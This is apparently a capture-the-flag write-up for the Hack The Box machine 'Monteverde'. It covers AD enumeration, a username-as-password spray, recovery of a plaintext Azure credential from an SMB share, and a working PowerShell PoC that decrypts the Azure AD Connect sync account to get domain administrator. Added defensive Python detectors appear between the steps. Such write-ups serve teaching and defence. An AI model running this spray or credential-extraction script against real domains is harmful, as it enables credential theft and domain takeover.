Monteverde

Recon

nmap_scan.log
Open 10.129.228.111:53
Open 10.129.228.111:88
Open 10.129.228.111:135
Open 10.129.228.111:139
Open 10.129.228.111:389
Open 10.129.228.111:445
Open 10.129.228.111:464
Open 10.129.228.111:593
Open 10.129.228.111:3269
Open 10.129.228.111:3268
Open 10.129.228.111:5985
Open 10.129.228.111:9389
Open 10.129.228.111:49667
Open 10.129.228.111:49700
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.111

PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-12-04 18:48:34Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-04T18:49:26
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59714/tcp): CLEAN (Timeout)
|   Check 2 (port 34394/tcp): CLEAN (Timeout)
|   Check 3 (port 29693/udp): CLEAN (Timeout)
|   Check 4 (port 62380/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

LDAP

We can log in to SMB with a NULL session, but get no access to any resources or actions. We can still enumerate LDAP:

└─$ netexec ldap 10.129.228.111 -u '' -p '' --users | tee ldap_users.txt
SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP                     10.129.228.111  389    MONTEVERDE       [+] MEGABANK.LOCAL\:
LDAP                     10.129.228.111  389    MONTEVERDE       [*] Total records returned: 270
...Too much garbage...
└─$ enum4linux-ng megabank.local | tee enum4linux.log
ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... megabank.local
[*] Username ......... ''
[*] Random Username .. 'kapyieei'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 =======================================
|    Listener Scan on megabank.local    |
 =======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ======================================================
|    Domain Information via LDAP for megabank.local    |
 ======================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: MEGABANK.LOCAL

 ===========================================
|    SMB Dialect Check on megabank.local    |
 ===========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

 =============================================================
|    Domain Information via SMB session for megabank.local    |
 =============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: MONTEVERDE
NetBIOS domain name: MEGABANK
DNS domain: MEGABANK.LOCAL
FQDN: MONTEVERDE.MEGABANK.LOCAL
Derived membership: domain member
Derived domain: MEGABANK

 ===========================================
|    RPC Session Check on megabank.local    |
 ===========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE

 =====================================================
|    Domain Information via RPC for megabank.local    |
 =====================================================
[+] Domain: MEGABANK
[+] Domain SID: S-1-5-21-391775091-850290835-3566037492
[+] Membership: domain member

 =================================================
|    OS Information via RPC for megabank.local    |
 =================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null

 =======================================
|    Users via RPC on megabank.local    |
 =======================================
[*] Enumerating users via 'querydispinfo'
[+] Found 10 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 10 user(s) via 'enumdomusers'
[+] After merging user results we have 10 user(s) total:
'1104':
  username: AAD_987d7f2f57d2
  name: AAD_987d7f2f57d2
  acb: '0x00000210'
  description: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
'1601':
  username: mhope
  name: Mike Hope
  acb: '0x00000210'
  description: (null)
'2602':
  username: SABatchJobs
  name: SABatchJobs
  acb: '0x00000210'
  description: (null)
'2603':
  username: svc-ata
  name: svc-ata
  acb: '0x00000210'
  description: (null)
'2604':
  username: svc-bexec
  name: svc-bexec
  acb: '0x00000210'
  description: (null)
'2605':
  username: svc-netapp
  name: svc-netapp
  acb: '0x00000210'
  description: (null)
'2613':
  username: dgalanos
  name: Dimitris Galanos
  acb: '0x00000210'
  description: (null)
'2614':
  username: roleary
  name: Ray O'Leary
  acb: '0x00000210'
  description: (null)
'2615':
  username: smorgan
  name: Sally Morgan
  acb: '0x00000210'
  description: (null)
'501':
  username: Guest
  name: (null)
  acb: '0x00000215'
  description: Built-in account for guest access to the computer/domain


Completed after 23.82 seconds

Get valid usernames

└─$ grep username: enum4linux.log | awk '{print($2)}' > users.txt
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Guest

There's ADSync-related stuff here: AAD_<hex> is probably the Azure AD Connect agent's service account, the one that synchronizes on-prem AD with Azure AD.

We could start brute-forcing passwords with rockyou or similar, but first let's check whether anyone is using their username as their password:

└─$ netexec smb 10.129.228.111 -u users.txt -p users.txt --no-bruteforce
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

SMB

└─$ netexec smb 10.129.228.111 -u SABatchJobs -p SABatchJobs --shares
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB         10.129.228.111  445    MONTEVERDE       [*] Enumerated shares
SMB         10.129.228.111  445    MONTEVERDE       Share           Permissions     Remark
SMB         10.129.228.111  445    MONTEVERDE       -----           -----------     ------
SMB         10.129.228.111  445    MONTEVERDE       ADMIN$                          Remote Admin
SMB         10.129.228.111  445    MONTEVERDE       azure_uploads   READ
SMB         10.129.228.111  445    MONTEVERDE       C$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       E$                              Default share
SMB         10.129.228.111  445    MONTEVERDE       IPC$            READ            Remote IPC
SMB         10.129.228.111  445    MONTEVERDE       NETLOGON        READ            Logon server share
SMB         10.129.228.111  445    MONTEVERDE       SYSVOL          READ            Logon server share
SMB         10.129.228.111  445    MONTEVERDE       users$          READ
└─$ netexec smb 10.129.228.111 -u SABatchJobs -p SABatchJobs -M spider_plus -o DOWNLOAD_FLAG=True
...
└─$ lta /tmp/nxc_spider_plus/10.129.228.111/
drwxrwxr-x    - woyag  4 Dec 14:30  /tmp/nxc_spider_plus/10.129.228.111
drwxrwxr-x    - woyag  4 Dec 14:30 ├──  SYSVOL
drwxrwxr-x    - woyag  4 Dec 14:30 │  └──  MEGABANK.LOCAL
drwxrwxr-x    - woyag  4 Dec 14:30 │     └──  Policies
drwxrwxr-x    - woyag  4 Dec 14:30 │        ├──  {6AC1786C-016F-11D2-945F-00C04fB984F9}
.rw-rw-r--   22 woyag  4 Dec 14:30 │        │  ├──  GPT.INI
drwxrwxr-x    - woyag  4 Dec 14:30 │        │  └──  MACHINE
drwxrwxr-x    - woyag  4 Dec 14:30 │        │     └──  Microsoft
drwxrwxr-x    - woyag  4 Dec 14:30 │        │        └──  'Windows NT'
drwxrwxr-x    - woyag  4 Dec 14:30 │        │           └──  SecEdit
.rw-rw-r-- 4.5k woyag  4 Dec 14:30 │        │              └──  GptTmpl.inf
drwxrwxr-x    - woyag  4 Dec 14:30 │        └──  {31B2F340-016D-11D2-945F-00C04FB984F9}
.rw-rw-r--   22 woyag  4 Dec 14:30 │           ├──  GPT.INI
drwxrwxr-x    - woyag  4 Dec 14:30 │           └──  MACHINE
drwxrwxr-x    - woyag  4 Dec 14:30 │              ├──  Microsoft
drwxrwxr-x    - woyag  4 Dec 14:30 │              │  └──  'Windows NT'
drwxrwxr-x    - woyag  4 Dec 14:30 │              │     └──  SecEdit
.rw-rw-r-- 1.1k woyag  4 Dec 14:30 │              │        └──  GptTmpl.inf
.rw-rw-r-- 2.8k woyag  4 Dec 14:30 │              └──  Registry.pol
drwxrwxr-x    - woyag  4 Dec 14:30 └──  users$
drwxrwxr-x    - woyag  4 Dec 14:30    └──  mhope
.rw-rw-r-- 1.2k woyag  4 Dec 14:30       └──  azure.xml
└─$ cat /tmp/nxc_spider_plus/10.129.228.111/users\$/mhope/azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs> 
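The azure.xml above is an Export-Clixml dump of a PSADPasswordCredential with the password stored as a plain <S> string. As an added example (not part of the original writeup), here is a small share-audit helper that flags such serialized secrets by type and property name without ever printing the value; the sample document is constructed with a dummy password, and the SECRET_NAMES pattern is an assumption to tune per environment:

```python
import re
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# Property names that indicate a serialized secret (assumption: tune to your environment)
SECRET_NAMES = re.compile(r"(password|secret|token|apikey|credential)", re.IGNORECASE)

# Constructed sample: same shape as the azure.xml found on users$, with a dummy value
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">REDACTED-SAMPLE</S>
    </Props>
  </Obj>
</Objs>"""


def find_clixml_secrets(xml_text):
    """Return (type_name, property_name) pairs for plaintext, secret-looking
    properties in a PowerShell CLIXML document. Values are never returned,
    so the audit report can be shared without re-leaking the credential."""
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != PS_NS + "Objs":
        return findings  # not a CLIXML export at all
    for obj in root.iter(PS_NS + "Obj"):
        # The first <T> in the type-name list is the concrete .NET type
        t = obj.find(PS_NS + "TN/" + PS_NS + "T")
        type_name = t.text if t is not None else "unknown"
        props = obj.find(PS_NS + "Props")
        if props is None:
            continue
        for prop in props:
            name = prop.get("N", "")
            # <S> is a plain string; <SS> would be a DPAPI-protected SecureString
            is_plain = prop.tag == PS_NS + "S" and (prop.text or "").strip()
            if is_plain and SECRET_NAMES.search(name):
                findings.append((type_name, name))
    return findings


def scan_file(path):
    """Audit one .xml file pulled from a share (Export-Clixml writes a UTF-8 BOM)."""
    with open(path, encoding="utf-8-sig") as fh:
        return find_clixml_secrets(fh.read())


if __name__ == "__main__":
    for type_name, prop in find_clixml_secrets(SAMPLE_CLIXML):
        print(f"plaintext secret property '{prop}' in serialized {type_name}")
```

Pointing scan_file at a mirror of the readable shares (the spider_plus output directory works) turns this into a quick check that no one has exported credentials the way mhope did.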
└─$ netexec smb 10.129.228.111 -u users.txt -p '4n0therD4y@n0th3r$'
SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$
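Both netexec runs above (username-as-password, then one recovered password against the whole user list) are password sprays: few passwords, many accounts, so per-account lockout never trips. As an added example, not from the original writeup, the detection below groups Windows logon failures (event 4625) by source address instead of by account; the records and the 10.10.x.x addresses are constructed, and the window and threshold are assumptions to tune:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4625 (logon failure) records: (timestamp, source ip, account name).
# The first group mirrors a spray over users.txt; the last two are an ordinary typo.
SAMPLE_EVENTS = [
    ("2024-12-04T18:50:01", "10.10.14.5", "AAD_987d7f2f57d2"),
    ("2024-12-04T18:50:01", "10.10.14.5", "mhope"),
    ("2024-12-04T18:50:02", "10.10.14.5", "svc-ata"),
    ("2024-12-04T18:50:02", "10.10.14.5", "svc-bexec"),
    ("2024-12-04T18:50:03", "10.10.14.5", "svc-netapp"),
    ("2024-12-04T18:50:03", "10.10.14.5", "dgalanos"),
    ("2024-12-04T18:50:04", "10.10.14.5", "roleary"),
    ("2024-12-04T18:50:04", "10.10.14.5", "smorgan"),
    ("2024-12-04T18:51:10", "10.10.20.7", "smorgan"),
    ("2024-12-04T18:51:25", "10.10.20.7", "smorgan"),
]


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: distinct_accounts} for sources that fail logons for
    at least min_accounts different accounts inside a sliding time window.
    A spray stays under the per-account lockout threshold, but grouping the
    failures by source makes the fan-out across accounts obvious."""
    by_source = defaultdict(list)
    for ts, src, user in events:
        by_source[src].append((datetime.fromisoformat(ts), user))
    alerts = {}
    for src, fails in by_source.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it fits within `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {u for _, u in fails[start:end + 1]}
            if len(accounts) >= min_accounts:
                alerts[src] = max(len(accounts), alerts.get(src, 0))
    return alerts


if __name__ == "__main__":
    for src, n in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"ALERT possible password spray from {src}: {n} accounts in window")
```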

WinRM

└─$ netexec winrm 10.129.228.111 -u mhope -p '4n0therD4y@n0th3r$'
WINRM       10.129.228.111  5985   MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
WINRM       10.129.228.111  5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)

└─$ evil-winrm -i 10.129.228.111 -u mhope -p '4n0therD4y@n0th3r$'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

User.txt

*Evil-WinRM* PS C:\Users\mhope\Documents> cat ../Desktop/user.txt
147c15950dace62900b58a965cd5f39b

Privilege Escalation

We are a member of Azure Admins. Googling "Azure Admins Connect Agent Priv Esc" leads to https://github.com/Cloud-Architekt/AzureAD-Attack-Defense/blob/main/AADCSyncServiceAccount.md

The approaches listed there need Python, and the second one needs the whole module to work, which is too much for this box.

Azure AD Connect for Red Teamers

Its script needs a connection string to the ADSync database, and this account has access to the SQL server. The MSSQL enumeration queries below are from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md#mssql-enumeration

*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -Q 'SELECT name FROM master..sysdatabases;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
ADSync

(5 rows affected)
*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -Q "SELECT name FROM master..sysobjects WHERE xtype = 'U';"
name
--------------------------------------------------------------------------------------------------------------------------------
trace_xe_action_map
trace_xe_event_map
spt_fallback_db
spt_fallback_dev
spt_fallback_usg
spt_monitor

---

*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -Q "USE ADSync; SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
Changed database context to 'ADSync'.
private_configuration_xml                                                                                                                                                                                                                                        encrypted_configuration
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<adma-configuration>
 <forest-name>MEGABANK.LOCAL</forest-name>
 <forest-port>0</forest-port>
 <forest-guid>{00000000-0000-0000-0000-000000000000}</forest-guid>
 <forest-login-user>administrator</forest-login-user>
 <forest-login-domain>MEGABANK.LOCAL 8AAAAAgAAABQhCBBnwTpdfQE6uNJeJWGjvps08skADOJDqM74hw39rVWMWrQukLAEYpfquk2CglqHJ3GfxzNWlt9+ga+2wmWA0zHd3uGD8vk/vfnsF3p2aKJ7n9IAB51xje0QrDLNdOqOxod8n7VeybNW/1k+YWuYkiED3xO8Pye72i6D9c5QTzjTlXe5qgd4TCdp4fmVd+UlL/dWT/mhJHve/d9zFr2EX5r5+1TLbJCzYUHqFLvvpCd1rJEr68g

(1 rows affected)

---

*Evil-WinRM* PS C:\Users\mhope\Documents> sqlcmd -L # List connection strings

Servers:
    ;UID:Login ID=?;PWD:Password=?;Trusted_Connection:Use Integrated Security=?;*APP:AppName=?;*WSID:WorkStation ID=?;

We can run the script from the blog post with Windows Authentication (Integrated Security=True in the connection string):

Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=localhost;Initial Catalog=ADSync;Integrated Security=True;"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
---
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
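The decisive step in the script above is add-type loading mcrypt.dll into an interactive powershell.exe session, since its KeyManager is what turns encrypted_configuration into the connector password. As an added example (not from the writeup or from Microsoft), the detection below runs over constructed Sysmon Event ID 7 (ImageLoaded) records and flags any loader of mcrypt.dll outside the AD Sync install directory; the JSON shape and the assumption that only binaries under that directory legitimately load the DLL are mine:

```python
import json
import ntpath

# Constructed Sysmon Event ID 7 (ImageLoaded) records, one JSON object per line.
# Line 1: the Synchronization Service loading its crypto DLL under the AAD_ service
# account enumerated earlier. Line 2: the PoC pattern, mcrypt.dll inside powershell.exe
# owned by an interactive user. Line 3: a normal DLL load that must not alert.
SAMPLE_LOG = r'''
{"EventID": 7, "Image": "C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\miiserver.exe", "ImageLoaded": "C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll", "User": "MEGABANK\\AAD_987d7f2f57d2"}
{"EventID": 7, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ImageLoaded": "C:\\Program Files\\Microsoft Azure AD Sync\\Bin\\mcrypt.dll", "User": "MEGABANK\\mhope"}
{"EventID": 7, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ImageLoaded": "C:\\Windows\\System32\\ntdll.dll", "User": "MEGABANK\\mhope"}
'''

# Assumption: only binaries shipped in the AD Sync install directory should load mcrypt.dll.
ADSYNC_DIR = "C:\\Program Files\\Microsoft Azure AD Sync\\"


def find_rogue_mcrypt_loads(log_text):
    """Return (user, image) pairs for processes outside ADSYNC_DIR that load
    mcrypt.dll. Everything else (other DLLs, the sync service itself) is ignored."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 7:
            continue
        loaded = ntpath.basename(ev.get("ImageLoaded", "")).lower()
        image = ev.get("Image", "")
        if loaded == "mcrypt.dll" and not image.lower().startswith(ADSYNC_DIR.lower()):
            hits.append((ev.get("User", "?"), image))
    return hits


if __name__ == "__main__":
    for user, image in find_rogue_mcrypt_loads(SAMPLE_LOG):
        print(f"ALERT mcrypt.dll loaded by {image} as {user}")
```

Pair this with a SQL Server audit on the ADSync database, since the same PoC also reads mms_server_configuration and mms_management_agent from a non-service login.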

Root.txt

└─$ evil-winrm -i 10.129.228.111 -u administrator -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
e7ab35ef55a0b7c1e9bbd973e5757afd
